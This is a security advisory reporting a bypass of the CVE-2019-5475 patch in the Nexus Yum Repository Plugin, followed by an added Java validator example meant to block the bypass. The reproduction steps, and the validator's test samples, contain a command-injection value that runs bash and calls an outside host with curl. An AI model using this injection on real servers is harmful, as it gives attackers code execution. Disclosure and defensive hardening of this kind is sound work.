groupId: org.sonatype.nexus.plugins
artifactId: nexus-yum-repository-plugin
version: 2.14.14-01
The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All instances using CommandLineExecutor.java with user-supplied data are vulnerable, such as the Yum Configuration Capability.
Take a look at the patch for CVE-2019-5475. The filtering in the getCleanCommand method is incomplete and can still be bypassed.
Navigate to “Capabilities” in Nexus Repository Manager.
Edit or create a new Yum: Configuration capability.
Set the path of “createrepo” or “mergerepo” to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo).
An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
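As an added example (not code from the plugin or from this report), the sketch below shows a stricter check for a configured executable path: the whole value must match a character allowlist and name one of the two expected tools, and the tool is then launched from an argument list with no shell involved. The class, method and constant names are hypothetical, and POSIX-style paths are assumed.

```java
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;

// Added example; ExecutablePathCheck, ALLOWED_NAMES and both methods are hypothetical names.
public class ExecutablePathCheck {
    private static final Set<String> ALLOWED_NAMES =
        new HashSet<>(Arrays.asList("createrepo", "mergerepo"));

    /** Returns the normalized path, or throws if the value is not a bare path to an allowed tool. */
    static Path validateExecutable(String configured) {
        // Whole-string allowlist: spaces, $, {, |, ;, & and quotes all fall outside it.
        if (configured == null || !configured.matches("[A-Za-z0-9._/-]+")) {
            throw new IllegalArgumentException("illegal character in path");
        }
        Path p = Paths.get(configured).normalize();
        Path name = p.getFileName();
        if (name == null || !ALLOWED_NAMES.contains(name.toString())) {
            throw new IllegalArgumentException("not an allowed executable");
        }
        // Accept an absolute path, or the bare tool name resolved through PATH.
        if (!p.isAbsolute() && p.getNameCount() != 1) {
            throw new IllegalArgumentException("relative path with directories");
        }
        return p;
    }

    /** Builds the process from an argument list, so no shell parses the configured value. */
    static ProcessBuilder buildCommand(String configured, List<String> args) {
        List<String> argv = new ArrayList<>();
        argv.add(validateExecutable(configured).toString());
        argv.addAll(args);
        return new ProcessBuilder(argv);
    }

    public static void main(String[] args) {
        String[] samples = {            // constructed inputs; the second is the value from the report
            "/usr/bin/createrepo",
            "/bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo",
            "/usr/bin/../bin/mergerepo",
            "createrepo"
        };
        for (String s : samples) {
            try {
                System.out.println("accept " + buildCommand(s, Arrays.asList("--version")).command());
            } catch (IllegalArgumentException e) {
                System.out.println("reject " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```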